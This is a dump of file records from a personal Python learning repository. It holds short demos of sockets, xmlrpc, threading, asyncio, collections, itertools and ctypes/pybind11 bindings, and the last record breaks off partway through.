"alpha_fraction": 0.7080891132354736,
"alphanum_fraction": 0.7245017290115356,
"avg_line_length": 21.421052932739258,
"blob_id": "fde5a1ce760272d72e180f2bc2f84392096ae50d",
"content_id": "29d34423587679a56f2e8d67c1b4b0d42aefac3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 853,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 38,
"path": "/xmlrpc/README.md",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "**python3 only**\n\n#### refer to https://pymotw.com/3/xmlrpc.server/index.html\n\n\txmlrpc.client.ServerProxy('http://localhost:9000', verbose=True)\n\tallow_none=False\n\t\tNone -> Nil\n\tuse_datetime=True\n\tobject sent as dictory\n\t\tuse pickle as an alternative\n\n### example 1\n\tregister_function\n\n### example 2\n\tregister_instance (class instance)\n\n### example 3\n\tregister_isntance with _dispatch logic, to protect methods in classes.\n\n### multicall wrapper extension\n\n```\nimport xmlrpc.client\nserver = xmlrpc.client.ServerProxy('http://localhost:9000')\n\nmulticall = xmlrpc.client.MultiCall(server)\nmulticall.ping()\nmulticall.show_type(1)\nmulticall.raises_exception('Next to last call stops execution')\nmulticall.show_type('string')\n\ntry:\n for i, r in enumerate(multicall()):\n print(i, r)\nexcept xmlrpc.client.Fault as err:\n print('ERROR:', err)\n````\n\n"
},
{
"alpha_fraction": 0.6349431872367859,
"alphanum_fraction": 0.6420454382896423,
"avg_line_length": 22.46666717529297,
"blob_id": "9f5e8760eda3f2336840c67146c74ff6df4da043",
"content_id": "1439409eb6f2f3f3e19d49d4fea77cd98b05a1cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 708,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 30,
"path": "/collections_demo/demo_ChainMap.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# The ChainMap class manages a sequence of dictionaries, \n# + and searches through them in the order they are given to find values by keys. \n# A ChainMap makes a good “context” container, since it can be treated as a stack for \n# + which changes happen as the stack grows, with these changes being discarded again \n# + as the stack shrinks.\n\nfrom collections import ChainMap\n\na = {'a': 'A', 'c': 'C'}\nb = {'b': 'B', 'c': 'D'}\n\nm = ChainMap(a, b)\n\nprint(m.maps)\nprint('c = {}'.format(m['c']))\n\n# reverse the list\nm.maps = list(reversed(m.maps))\n\nprint(m.maps)\nprint('c = {}'.format(m['c']))\n\n# new_child()\nm2 = m.new_child()\nm2['c'] = \"E\"\nprint(m2.maps)\n\nc = {'c': 'E'}\nm3 = m.new_child(c)\nprint(m3.maps)\n"
},
{
"alpha_fraction": 0.5671641826629639,
"alphanum_fraction": 0.5671641826629639,
"avg_line_length": 15.75,
"blob_id": "70e391314a784eeeb7f9906fa8138c6dbb7ae5ca",
"content_id": "85ebe5916cc5271eec01833a6ca63f4cb99a89b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 8,
"path": "/ffi/ctypes_demo/example2/Makefile",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "libline.so: point.o line.o\n\tgcc -shared $^ -o $@\n\nlibpoint.so: point.o\n\tgcc -shared $^ -o $@\n\n%.o: %.c\n\tgcc -c -Wall -Werror -fpic $^\n"
},
{
"alpha_fraction": 0.5646359324455261,
"alphanum_fraction": 0.570579469203949,
"avg_line_length": 21.399999618530273,
"blob_id": "46301837c54eba0a7fa8c98059e3d5d03e498ea5",
"content_id": "81186904fa47b5adcebd1ee9acb86a526ed7109f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 673,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 30,
"path": "/sockets/uds/server.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\nimport os\n\nsock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\naddr = \"./uds_socket\"\n\n# addr must be cleared before server start listening\ntry:\n os.unlink(addr)\nexcept OSError:\n if os.path.exists(addr):\n raise\n\nsock.bind(addr)\nsock.listen(1) # only 1 connection\n\nwhile True:\n conn, client_addr = sock.accept()\n print(\"client address: {}\".format(client_addr))\n try:\n while True:\n chunk = conn.recv(16)\n print('Received: {}'.format(chunk))\n if chunk:\n conn.sendall(chunk)\n else:\n print(\"Done!\")\n break\n finally:\n conn.close()\n\n"
},
{
"alpha_fraction": 0.6376237869262695,
"alphanum_fraction": 0.6435643434524536,
"avg_line_length": 25.578947067260742,
"blob_id": "81b164bd28736efba93d7c2ea3c70ceeddc79809",
"content_id": "33eaf980c556641bf522e29a6b4591573d8fbbd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 19,
"path": "/concurrency/threading_demo4.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import logging\nimport time\nfrom concurrent.futures import ThreadPoolExecutor\n\n\ndef job(name):\n logging.info(f\"thread {name} starting\")\n time.sleep(1)\n logging.info(f\"thread {name} finished\")\n\n\nif __name__ == \"__main__\":\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n # context manager will call .join()\n with ThreadPoolExecutor(max_workers=3) as executor:\n executor.map(job, range(6))\n"
},
{
"alpha_fraction": 0.6732673048973083,
"alphanum_fraction": 0.6732673048973083,
"avg_line_length": 19.200000762939453,
"blob_id": "f3a728054c319cbb548070fe58ad312590bcce33",
"content_id": "87e626a1cab01b6ace2d138988784e63f723565c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 5,
"path": "/ffi/ctypes_demo/example1/Makefile",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "clib.so: clib.o\n\tgcc -shared -o libclib.so clib.o\n\nclib.o: clib.c\n\tgcc -c -Wall -Werror -fpic clib.c\n"
},
{
"alpha_fraction": 0.525896430015564,
"alphanum_fraction": 0.5657370686531067,
"avg_line_length": 18.230770111083984,
"blob_id": "32022a2bc9a3116286081e398eac83276dd8e5a4",
"content_id": "7ed00b2080a51b318af2e0415430fba4be629a2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 13,
"path": "/pybind/examples/ex2/example.cpp",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "\n// file example.cpp\n/*\n<%\nsetup_pybind11(cfg)\n%>\n*/\n#include <pybind11/pybind11.h>\nnamespace py = pybind11;\n\nPYBIND11_MODULE(example, m) {\n m.def(\"add\", [](int a, int b) { return a + b; });\n m.def(\"mult\", [](int a, int b) { return a * b; });\n}\n"
},
{
"alpha_fraction": 0.7169811129570007,
"alphanum_fraction": 0.7169811129570007,
"avg_line_length": 18.272727966308594,
"blob_id": "d44928950ad29ae64672322ccabe3de3f5a1a82f",
"content_id": "f519d957e67c4cf9a7e2d545c27956ad93d30262",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 11,
"path": "/collections_demo/demo_defaultdict.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "from collections import defaultdict\n\n# first argument must be callable or None\nwc = defaultdict(int)\nprint(wc['hello'])\n\ndd = defaultdict(list)\nprint(dd)\ndd['a'].append(\"Hello\")\ndd['a'].append(\"World\")\nprint(dd)\n"
},
{
"alpha_fraction": 0.6241496801376343,
"alphanum_fraction": 0.6352040767669678,
"avg_line_length": 27.682926177978516,
"blob_id": "84ca4c59435042d17a6487f6263599e499b04fc5",
"content_id": "e54185eed085803ba5820e6c1ec73af5ec26c622",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1176,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 41,
"path": "/concurrency/threading_demo7.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# producer-consumer question\n\nimport time\nimport logging\nfrom concurrent.futures import ThreadPoolExecutor\nfrom threading import Event\nfrom queue import Queue\nimport random\n\n\ndef producer(q, event):\n \"\"\"fill the queue 'q' until event is set\"\"\"\n while not event.is_set():\n message = random.randint(1, 101) # [1, 100]\n logging.info(f\"produce: {message}\")\n q.put(message)\n logging.info(\"producer quit!\")\n\n\ndef consumer(q, event):\n \"\"\"empty the queue unitl event is set or queue is empty\"\"\"\n while not event.is_set() or not q.empty():\n message = q.get() # block but not raise exception\n logging.info(f\"consumer taken {message}\")\n logging.info(\"consumer quit!\")\n\n\nif __name__ == \"__main__\":\n event = Event()\n que = Queue(maxsize=10)\n\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n with ThreadPoolExecutor(max_workers=2) as executor:\n executor.submit(producer, que, event)\n executor.submit(consumer, que, event)\n time.sleep(0.1)\n logging.info(\"main thread set the event\")\n event.set()\n"
},
{
"alpha_fraction": 0.5661478638648987,
"alphanum_fraction": 0.570038914680481,
"avg_line_length": 22.363636016845703,
"blob_id": "5c452f9696cc23be677b951b93daffc6c734c868",
"content_id": "a120002e2218eef911f1822aa03281524195e272",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 514,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 22,
"path": "/concurrency/threading_demo3.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import logging\nimport time\nimport threading\n\ndef job(name):\n logging.info(f\"thread {name} starting\")\n time.sleep(1)\n logging.info(f\"thread {name} finished\")\n\nif __name__ == \"__main__\":\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n threads = []\n for i in range(5):\n t = threading.Thread(target=job, args=(i,))\n threads.append(t)\n t.start()\n\n for t in threads:\n t.join()\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.7509999871253967,
"avg_line_length": 30.21875,
"blob_id": "b133fd93eac7d0482b8db2c1b4d03cf9b797ff3c",
"content_id": "763761fbf2ee1d97c241f56d6e7271577d669f97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1000,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 32,
"path": "/ffi/ctypes_demo/example1/test.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import ctypes\n\nlibc = ctypes.CDLL(\"./libclib.so\")\n\n# python string is immutable\noriginal_string = \"starting string\"\n# ctypes string_buffer (bytes array) is mutable\nmutable_string = ctypes.create_string_buffer(str.encode(original_string))\n\nprint(\"Before: original:\", original_string)\nlibc.add_one_to_string(original_string)\nprint(\"After: original:\", original_string)\n\nprint(\"Before: mutable: \", mutable_string.value)\nlibc.add_one_to_string(mutable_string) # Works!\nprint(\"After: mutable: \", mutable_string.value)\n\n\nalloc_func = libc.alloc_C_string\nfree_func = libc.free_C_string\nalloc_func.restype = ctypes.POINTER(ctypes.c_char)\nfree_func.argtypes = [ctypes.POINTER(ctypes.c_char), ]\n\nprint(\"Allocating and freeing memory in C\")\nc_string_address = alloc_func()\n\n# We should convert POINTER object to something we can use on the Python side\nphrase = ctypes.c_char_p.from_buffer(c_string_address)\nprint(\"Bytes in Python {0}\".format(phrase.value))\n\n# let C free the memory\nfree_func(c_string_address)\n\n"
},
{
"alpha_fraction": 0.6783625483512878,
"alphanum_fraction": 0.7105262875556946,
"avg_line_length": 33,
"blob_id": "7d87b5457a5b056c7d0bf552d16b8c139e628af6",
"content_id": "3ac6e250af24426a94a7455ca9c267fb7a95a9b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 342,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 10,
"path": "/itertools_demo/iter_demo_partition_iterable.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# partition an iterable into another iterable of chunks of size n\n# ref https://realpython.com/python-itertools/#what-is-itertools-and-why-should-you-use-it\n\ndef better_grouper(inputs, n):\n # same references in the following\n iters = [iter(inputs)] * n \n return zip(*iters)\n\nfor _ in better_grouper(range(100000000), 10):\n pass\n\n\n"
},
{
"alpha_fraction": 0.6077419519424438,
"alphanum_fraction": 0.6245161294937134,
"avg_line_length": 21.114286422729492,
"blob_id": "2c9a5e9dd3ea32fd075a36e85e06fd920b3e17ae",
"content_id": "2c17a64990ef7c6477159c2d22994aa7ef09dfc2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 775,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 35,
"path": "/generators_demo/generator_function_demo.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# a generator of palindrome numbers\n# ref: https://realpython.com/introduction-to-python-generators/\n\n# list comprehensions can be faster to evaluate than the equivalent generator expression. \n\n# StopIteration exception\n\n#Generator functions use the Python yield keyword instead of return\ndef infinite_sequence():\n num = 0\n while True:\n yield num\n num += 1\n\n\ndef is_palindrome(num):\n if num // 10 == 0:\n return True\n temp = num\n reversed_num = 0\n\n while temp != 0:\n reversed_num = (reversed_num * 10) + (temp % 10)\n temp = temp // 10\n\n if num == reversed_num:\n return num\n else:\n return False\n\nif __name__ == \"__main__\":\n\tfor i in infinite_sequence():\n\t\tpal = is_palindrome(i)\n\t\tif pal:\n\t\t\tprint(pal)\n\n"
},
{
"alpha_fraction": 0.6222570538520813,
"alphanum_fraction": 0.6426331996917725,
"avg_line_length": 20.266666412353516,
"blob_id": "498ff16bf5fb76899d0f9b6f2035175bf8d9e7bf",
"content_id": "9c91213e4b1e4102ed7bd1ecf0720aca19d59bdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 638,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 30,
"path": "/concurrency/async/async_demo2.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# chaining of coroutine\n\n# two phases that must be executed in order,\n# but that can run concurrently with other operation\n\nimport asyncio\n\n\nasync def outer():\n result1 = await phase1()\n result2 = await phase2(result1)\n return (result1, result2)\n\n\nasync def phase1():\n print('in phase1')\n return 'result1'\n\n\nasync def phase2(arg):\n print('in phase2')\n return 'result2 derived from {}'.format(arg)\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n try:\n return_value = loop.run_until_complete(outer())\n print('return value: {!r}'.format(return_value))\n finally:\n loop.close()\n"
},
{
"alpha_fraction": 0.5709571242332458,
"alphanum_fraction": 0.5775577425956726,
"avg_line_length": 28.25806427001953,
"blob_id": "fb344b7a9ffbf6d74a249de04932c96d647442eb",
"content_id": "2101ec7c23a0f5482c1647fb0ee0a452bc7875f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 909,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 31,
"path": "/concurrency/threading_demo6.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import logging\nimport time\nfrom concurrent.futures import ThreadPoolExecutor\nfrom threading import Lock\n\nclass FakeDatabase:\n def __init__(self):\n self.value = 0\n self._lock = Lock()\n\n def update(self, name):\n with self._lock: # call .acquire and .release automatically\n local_copy = self.value # retrieve db\n local_copy += 1 # work....\n time.sleep(0.1)\n self.value = local_copy # save to db\n\n\nif __name__ == \"__main__\":\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n db = FakeDatabase()\n\n # context manager will call .join()\n with ThreadPoolExecutor(max_workers=3) as executor:\n for i in range(3):\n # .submit(function, *args, **kwargs)\n executor.submit(db.update, i)\n print(db.value)\n\n\n"
},
{
"alpha_fraction": 0.6491862535476685,
"alphanum_fraction": 0.6763110160827637,
"avg_line_length": 19.407407760620117,
"blob_id": "7038eb5582e1153bb545ca28d325140fd4824402",
"content_id": "0e7bd71d4d654bcd0c5bb5acb339fef1086384ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 553,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 27,
"path": "/collections_demo/demo_deque_threadsafe.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# deqeue is threadsafe\n\nfrom collections import deque\nfrom threading import Thread\nimport time \nimport random\n\ncandle = deque(range(100))\n\ndef consumer(direction, func):\n\twhile True:\n\t\ttry:\n\t\t\tval = func() # pop(), or popleft()\n\t\t\ttime.sleep(0.01*random.randint(1,10))\n\t\texcept IndexError:\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"{}: {}\".format(direction, val))\n\tprint(\"{}: Done!\".format(direction))\n\nt1 = Thread(target=consumer, args=(\"left\", candle.popleft) )\nt2 = Thread(target=consumer, args=(\"right\", candle.pop) )\n\nt1.start()\nt2.start()\nt1.join()\nt2.join()\n\n\n"
},
{
"alpha_fraction": 0.6882352828979492,
"alphanum_fraction": 0.6882352828979492,
"avg_line_length": 17.88888931274414,
"blob_id": "327df3283263bfef400757c037995f49901ce1c4",
"content_id": "28e40751dd36b56bdc1e861675862a94fe3e1fda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 170,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 9,
"path": "/ffi/ctypes_demo/example2/point.h",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "typedef struct {\n int x;\n int y;\n} Point;\n\nvoid show_point(Point point);\nvoid move_point(Point point);\nvoid move_point_by_ref(Point *point);\nPoint get_point(void);\n"
},
{
"alpha_fraction": 0.6296296119689941,
"alphanum_fraction": 0.6378600597381592,
"avg_line_length": 20.130434036254883,
"blob_id": "f96341a05a2fb0208491c409b1054ed7fa535f83",
"content_id": "ba2843a53c54fa67a978a5d6cd9ba8eb5ea24cfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 486,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 23,
"path": "/sockets/uds/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\nimport sys\n\nsock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\naddr = \"./uds_socket\"\ntry:\n sock.connect(addr)\nexcept socket.error as msg:\n print(msg)\n sys.exit(1)\n\nmessage = b'This is the message. It will be echoed from the server.'\n\ntry:\n sock.sendall(message)\n counts = 0\n amount = len(message)\n while counts < amount:\n chunk = sock.recv(16)\n counts += len(chunk)\n print(\"Got {}\".format(chunk))\nfinally:\n sock.close()\n"
},
{
"alpha_fraction": 0.6552631855010986,
"alphanum_fraction": 0.678947389125824,
"avg_line_length": 28.230770111083984,
"blob_id": "e5a17e058e6bcfe5ea0147558e3d322ed3f22ce6",
"content_id": "fc4d4f74d5ed652699b75b0fc09a129cd036b496",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 380,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 13,
"path": "/sockets/udp/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserver_addr = ('localhost', 10000)\nmessage = b'This is the message. It will be repeated.'\n\ntry:\n sent = sock.sendto(message, server_addr)\n print(\"sent {} bytes to {}\".format(sent, server_addr))\n data, server = sock.recvfrom(4096)\n print(\"received back {}\".format(data))\nfinally:\n sock.close()\n"
},
{
"alpha_fraction": 0.7868020534515381,
"alphanum_fraction": 0.7868020534515381,
"avg_line_length": 14.076923370361328,
"blob_id": "c397711d5436550113751d20f82f759a5fb7a318",
"content_id": "7ab54c62d0a2509843bd376b3d74a448120fa2ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 13,
"path": "/README.md",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# python-tricks\n\nshort code examples saving some python tricks for quick reference \n\n## Contents covered:\n\n context-manager\n\n generator expressions/functions\n \n itertools functions\n \n collections\n\n"
},
{
"alpha_fraction": 0.5245283246040344,
"alphanum_fraction": 0.5415094494819641,
"avg_line_length": 24.190475463867188,
"blob_id": "6c5115c77f76760e9a252d211500689bc1736360",
"content_id": "36c6f845d807903c20e6be0cab751b4ebf497526",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 21,
"path": "/sockets/tcp/server.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\naddr = ('localhost', 10000)\nsock.bind(addr)\nsock.listen(1) # only 1 connection\n\nwhile True:\n conn, client_addr = sock.accept()\n print(\"client address: {}\".format(client_addr))\n try:\n while True:\n chunk = conn.recv(16)\n print('Received: {}'.format(chunk))\n if chunk:\n conn.sendall(chunk)\n else:\n print(\"Done!\")\n break\n finally:\n conn.close()\n\n"
},
{
"alpha_fraction": 0.6151515245437622,
"alphanum_fraction": 0.6196969747543335,
"avg_line_length": 22.464284896850586,
"blob_id": "3bb484f08ccc5a1df9863ce5822ed6fab347a846",
"content_id": "93a1cd28ec892f9dae71e93b886a7c1e83bef6f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 660,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 28,
"path": "/context_manager_demo.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# context_manager.demo\n# ref. https://dbader.org/blog/python-context-managers-and-with-statement\n \nclass Indent(object):\n\tdef __init__(self):\n\t\tself.level = 0\n\n\tdef __enter__(self):\n\t\tself.level += 1\n\t\treturn self\n\n\tdef __exit__(self,exc_type, exc_val, exc_tb):\n\t\tself.level -= 1\n\n\tdef print(self, text):\n\t\tprint(\" \" * self.level + text)\n\n\nif __name__ == \"__main__\":\n\tprint(\"Entering indent context manager:\")\n\twith Indent() as indentor: \n # with Indent() called __init__() then __enter__()\n\t\tindentor.print(\"HI\")\n\t\twith indentor: # calls __enter__()\n\t\t\tindentor.print(\"John\")\n\t\t\twith indentor:\n\t\t\t\tindentor.print(\"Doe\")\n\t\tindentor.print(\"Bye!\")\n\n\n\n"
},
{
"alpha_fraction": 0.6662198305130005,
"alphanum_fraction": 0.6715817451477051,
"avg_line_length": 34.52381134033203,
"blob_id": "b7e5e232fd19e3d5604902d1b9680eefb1c11b48",
"content_id": "5adda6e4f963eafedc97079bfc8ab3ab47a73b8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 21,
"path": "/generators_demo/generator_expression_demo.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# generator_expession.py\n# build data pipeline using generator expressions\n# ref https://realpython.com/introduction-to-python-generators/\n\nfile_name = \"techcrunch.csv\"\nlines = (line for line in open(file_name))\nlist_line = (s.rstrip().split(\",\") for s in lines)\ncols = next(list_line)\ndict_line = (dict(zip(cols, data)) for data in list_line)\nfunding = ( int(d[\"raisedAmt\"]) for d in dict_line \n\t\t\t\t\t\t\t\tif d[\"round\"] == \"a\" )\n#total_series_a = sum(funding)\ntotal_series_a = 0\ncount_series_a = 0\nfor f in funding:\n\ttotal_series_a += f\n\tcount_series_a += 1\navg = total_series_a/count_series_a\nprint( f\"Num of Series A fundrasing {count_series_a}, \"\n\t f\"Total fundraising: ${total_series_a}, \"\n f\"Average fundraising ${avg:.2f}\" )\n"
},
{
"alpha_fraction": 0.7451523542404175,
"alphanum_fraction": 0.7534626126289368,
"avg_line_length": 31.81818199157715,
"blob_id": "2da4e643693907c7c7b50fc9eebdc89674bfd86a",
"content_id": "b6d46312c276ad59672371d2f090245979d8eae4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 361,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 11,
"path": "/collections_demo/demo_namedtuple.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "from collections import namedtuple\n\n# subclass tuple\n# Namedtuples are also a memory-efficient option when defining an immutable \n# +class in Python.\n\nfruit = namedtuple('fruit', ['name', 'color', 'price'])\nwatermelon = fruit('watermelon', 'green', 1.00)\nprint(watermelon)\nprint(watermelon.color, watermelon.name, watermelon.price)\nprint(watermelon._asdict())\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.6494565010070801,
"avg_line_length": 29.66666603088379,
"blob_id": "6b3067abdab7aab73195065e7fc05f408f58aa8c",
"content_id": "668f9284243929af4b235dbf5e76c2a822c97896",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 368,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 12,
"path": "/sockets/udp/server.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\naddr = ('localhost', 10000)\nsock.bind(addr)\n\nwhile True:\n data, client_addr = sock.recvfrom(4096)\n if data:\n print(\"received {} bytes from {}\".format(len(data), client_addr))\n size = sock.sendto(data, client_addr)\n print(\"sent {} bytes to {}\".format(size, client_addr))\n"
},
{
"alpha_fraction": 0.708791196346283,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 25,
"blob_id": "723658043dc8718ea939b12f5fa5b0cc043cbf80",
"content_id": "350f0113697ec0415da02fe500d553f14f1bc9be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 728,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 28,
"path": "/xmlrpc/example1/server.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# simple xmlrpc server. serving content of a directory\nfrom xmlrpc.server import SimpleXMLRPCServer\nimport logging\nimport os\n\nlogging.basicConfig(level=logging.INFO)\n\nserver = SimpleXMLRPCServer(\n ('localhost', 5678),\n logRequests=True,\n)\n\ndef listdir(dir_name): # dir_name absolute/relative path\n logging.info(\"list content of dir: {}\".format(dir_name))\n try:\n return os.listdir(dir_name)\n except OSError:\n return \"no such file or directory!\"\n\n# the client must access via \"dir()\" instead of \"listdir()\"\n# server.register_function(listdir, 'dir')\n# namespace is allowed\nserver.register_function(listdir, 'dir.list')\n\ntry:\n server.serve_forever()\nexcept KeyboardInterrupt:\n print(\"exit...\")\n"
},
{
"alpha_fraction": 0.7644110321998596,
"alphanum_fraction": 0.7644110321998596,
"avg_line_length": 25.53333282470703,
"blob_id": "a4222b44a127ab0d404bbe2e7fc710e4a1d94479",
"content_id": "f1536332acabca488a0e7af553c29032ecd36c05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 15,
"path": "/ffi/README.md",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "https://dbader.org/blog/python-cffi\nhttps://dbader.org/blog/python-ctypes-tutorial\n\nctypes:\n\tpython string immutable,\n\tctypes.string_buffer is mutable, -- char*\n\n\tfunction signature\n\n\tcfun = clib.func\n\tcfun.restype = ctypes.POINTER(ctypes.c_char)\n\tcfun.argtypes = [ctypes.POINTER(ctypes.c_char), ]\n\n\tcross-language marshalling\n\t the language that allocates the memory also needs to free the memory\n\n"
},
{
"alpha_fraction": 0.5116279125213623,
"alphanum_fraction": 0.5511627793312073,
"avg_line_length": 24.294116973876953,
"blob_id": "61a258fe769b64b7eaf8eae920ef062c16bf4c7b",
"content_id": "a2526d9efe7a5a24a66052677f7b0c6f1e52d78a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 17,
"path": "/itertools_demo/iter_demo_tea_slice_chain.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import itertools as it\n\ndef cut(deck, n):\n \"\"\"Return an iterator over a deck of cards cut at index `n`.\"\"\"\n deck1, deck2 = it.tee(deck, 2)\n top = it.islice(deck1, n)\n bottom = it.islice(deck2, n, None)\n return it.chain(bottom, top)\n\nranks = ['A', 'K', 'Q', 'J', '10', '9', '8', '7', '6', '5', '4', '3', '2']\nsuits = ['H', 'D', 'C', 'S']\n\ncards = it.product(ranks, suits)\n\ncards = cut(cards, 26)\n\nprint(list(cards))\n"
},
{
"alpha_fraction": 0.66847825050354,
"alphanum_fraction": 0.66847825050354,
"avg_line_length": 15.727272987365723,
"blob_id": "79eeaca0bdb85ae167a33236ece754dfa6bac9c2",
"content_id": "b4b4e666a591dc1194baccdcfa2bb3fa815d6fb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 11,
"path": "/ffi/ctypes_demo/example2/line.h",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
